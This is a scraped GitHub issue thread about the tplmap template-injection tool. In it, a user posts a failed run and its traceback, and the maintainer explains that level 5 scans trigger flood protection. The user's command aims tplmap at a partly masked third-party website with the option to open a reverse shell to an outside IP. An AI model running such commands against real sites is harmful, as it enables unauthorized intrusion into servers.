Giter Site home page Giter Site logo

Comments (2)

lacroutelacroute avatar lacroutelacroute commented on June 30, 2024

more info
:/opt/tplmap/tplmap$ sudo python ./tplmap.py -u "https://www.xxxx.de/bxxxxxr/hxxxxg/ixxo/[email protected]\z\`z'z"\" --level=5 -e mako --reverse-shell 82.246.2**.** 64917
[sudo] Mot de passe de fakessh : 
[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'query' is injectable
[+] Mako plugin is testing rendering with tag '${}'
[+] Mako plugin is testing } code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[!][tplmap] Exiting: ('Connection aborted.', BadStatusLine("''",))
Traceback (most recent call last):
File "./tplmap.py", line 26, in
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/opt/tplmap/tplmap/core/checks.py", line 135, in check_template_injection
current_plugin = detect_template_injection(channel)
File "/opt/tplmap/tplmap/core/checks.py", line 126, in detect_template_injection
current_plugin.detect()
File "/opt/tplmap/tplmap/core/plugin.py", line 65, in detect
self._detect_render()
File "/opt/tplmap/tplmap/core/plugin.py", line 275, in _detect_render
suffix = suffix
File "/opt/tplmap/tplmap/core/plugin.py", line 363, in render
blind = blind
File "/opt/tplmap/tplmap/core/plugin.py", line 317, in inject
result = self.channel.req(injection)
File "/opt/tplmap/tplmap/core/channel.py", line 285, in req
verify = False
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 473, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine("''",))
fakessh@fakessh:/opt/tplmap/tplmap$

from tplmap.

epinna avatar epinna commented on June 30, 2024

This happens because the --level 5 scan level send a large number of requests and the server kills the connections due to some flood request protection. Be careful to avoid dossing your targets.

from tplmap.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.